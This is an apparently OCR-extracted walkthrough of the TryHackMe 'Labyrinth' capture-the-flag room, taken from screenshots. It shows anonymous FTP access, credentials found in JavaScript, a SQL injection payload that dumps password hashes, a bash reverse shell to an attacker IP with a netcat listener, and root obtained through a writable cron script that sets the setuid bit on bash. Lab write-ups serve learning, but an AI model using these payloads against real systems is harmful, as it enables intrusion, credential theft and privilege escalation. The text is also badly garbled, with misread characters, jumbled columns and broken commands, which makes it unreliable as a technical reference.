tryhackme

View on GitHub

Labyrinth Fast

03 April 2022 11:07 AM

kaliS kali )- [—/Desktop/ctf/Labyrinth ] L-$ ftp 10.10.65.72 Connected to 10.10.65.72. 220 ProFTPD server (proFTPD) ffff:1ø.1ø.65.72] Name (10.10.65.72:kali): anonymous 331 Anonymous login ok, send your complete email address as your password password : 230 Anonymous access granted, restrictions apply Remote system type is UNIX. using binary mode to transfer files. ftP> Is 229 Entering Extended passive Mode (Il 1245121) 150 Opening ASCII mode data connection for file list 3 nobody 4096 Jun 15 2021 pub drwxr-xr-x nogroup 226 Transfer complete ftP> cd pub 250 CWD command successful ftp> Is -la 229 Entering Extended passive Mode ( 1 1 1577601 ) 150 opening ASCII mode data connection for file list drwxr-xr-x 3 nobody drwxr-xr-x 3 root drwxr-xr-x 2 root 1 root -rw-r r -- 226 Transfer complete ftP> get massage. txt nogroup root root root 4096 Jun 15 4096 Jun 15 4096 Jun 15 141 Jun 15 2021 . 2021 2021 . secret 2021 message. txt local: massage. txt remote: massage. txt 229 Entering Extended Passive Mode (1 1 1559211) 550 massage . txt: No such file or directory

ftp> cd . secret 250 CWD command successful ftP> Is -la 229 Entering Extended passive Mode (Il 1460881) 150 Opening ASCII mode data connection for file list drwxr-xr-x 2 root drwxr-xr-x -rw-r-- r 3 nobody 1 root 1 root root nogroup root root 4096 Jun 15 4096 Jun 15 30 Jun 15 114 Jun 15 2021 . 2021 2021 flag. txt 2021 keep_in_mind.txt 226 Transfer complete ftP> get flag. txt

(kaliS —/Desktop/ctf/Labyrinth ] total 20 drwxr-xr-x 2 kali kali 4096 Apr drwxr-xr-x 12 kali kali 4096 Apr I kali kali 30 Jun -rw-r -- r 1 kali kali 114 Jun -rw-r--r 1 kali kali 141 Jun 3 01:36 3 01 •.30 15 2021 flag. txt 15 2021 keep_in_mind.txt 15 2021 message. txt —/Desktop/ctf/LabyrinthJ cat flag. txt

kali S kali ) - C—/Desktop/ctf/Labyrinth] keep in mind. txt Not to forget, he forgets a lot of stuff, Minotaur that's why he likes to keep things on a timer literally

kal i S kal i ) - [ —/Desktop/ctf/Labyrinth] cat message. txt Daedalus is a clumsy Minotaur person , he forgets a lot of things arount the labyrinth, h r •nth have a look around, maybe you 'Il find something .

C O a 10.10.65.72/jsj Google Hacking DB PayloadsAIITheThings Index of /js Vigenere Solver - Last modified Size Description Parent Directory logm.js userlvl.is 2021-06-20 14:50 187 2021-06-20 14:50 1.4K 2021-06-20 14:50 2.3K

O a 10.10.65.72/jsj10ginjs @ PayloadsAUTheThings... VigenereSolver - ww... Google Hacking DB function ( gen for Daedalus "document) . { Thought it would be this easy? console. tog( "TEST" ) var •ail SC var password M if (email Il password fill all fields."); return false; type: •POSE, url: "login.php•, data: email: email, password: password cache: false, success: function(data) //alert (data); window. location.href "index.php• error: function(xhr, status, error) { console. error(xhr);

function pwdgen() //pwd gen for g2e55kh4ck5r Daedalus

function pwdgen() //pwd gen for Daedalus Daedalus g2e55kh4ck5r logic credentiall

O a 10.10.65.72nogs/post1 •s Google Hacking DB PayloadsAllTheThings... Vigenere Solver Index of /logs/post Last modified Size Description 2021-10-11 12:43 760

c O a 10.10.65.72/index,php •e Google Hacking DB @ PaytoadsAllTheThings... VigenereSolver Welcome to the begin of my Labyrinth Minotaur Choose table: People namePeople/nameCreature: Sear ch

- Minotaur! ! y Told you not to keep #rmissions in the same Shelf as the Others if the permission is equal to type=•• btn-secondarv"

Choose table: People namePeople/nameCreature: admin' Il 1=1 # Search 3 4 5 Eurycliedes Menekrates Philostratos Daedalus M!nOtaur 42354020b68C7ed28dCdeabd5a2bat8e Ob3bebe266a81fbfaa7 gdb1604c4e67f b83f966a6fSa9cff9c6e1c52bOaa635b b8e4c23686a3a12476ad7779e35tseb6 1765db9457f496a3985920gee81fbda4

r up to 20 no one line: ausae2eb68c7ed28dcdeabd5a2ba fae eb3bebe266a81fbfaa7gdb16e4cae67f 083 fg66a6fsagcff9c6e1c52beaa635b b8e4c23686a3a12476ad777ge3Sf5eb6 176sdb9457fag6a3985g20gee81fbdaa NTLM. moa, mos. shaE4, MySQL b3bebe266aB1fbfaa79db1604c4e67f 3f966a6f5a9cff9c6e1c52beaa635b PutiN mNcn I 'm not a robot Crack Hashes

login in to minotaus account

Home About secret_Stutf Logout

c O a 10.10.65.721echo.php •a Google Hacking DB PaytoadsAllTheThings... Vigenere Solver . •an.v... Welcome to my secret echo-pannel... echo something _ Q echo

kali S kali ) - C—/Desktop/ctf/Labyrinth] cat shell . sh /bin/bash /bin/bash -i /dev/tcp/1ø.9.1.229/9øø1 0>81

$ nc -nvlp 9001 listening on [any] 9001 connect to [10.9.1.229] from (UNKNOWN) [10.10.65.72] 32884 bash: cannot set terminal process group (709): Inappropriate ioctl for device bash: no job control in this shell bash: / root/.bashrc: Permission denied daemonalabyrinth : / opt/lampp/htdocs$ daemonölabyrinth:/opt/lampp/htdocs$ D

daemonalabyrinth:/timers$ cat timer.sh #! /bin/bash echo "dont fo forge ttt" >> /reminders/dontforget.txt

İ!/bin/bash chmod +5 /bin/bash

daemonä)labyrinth:/timers$ /bin/bash -p bash-4.4# id uid=l(daemon) gid=l(daemon) euid=ø(root) egid=ø(root) groups=ø(root),l(daemon) bash-4.4# bash bash : bash root whomai whomai: command not found whoami 1

bash-4.4# cd /root bash-4.4# Is txt snap xampp_setup_job bash-4.4# cat da_king_flek.txt bash-4.4# cd /home bash-4.4# Is anonftp minotaur user bash-4.4# cd user bash-4.4# Is flag. txt bash-4.4# cat flag. txt usEr_f1aG} bash-4.4#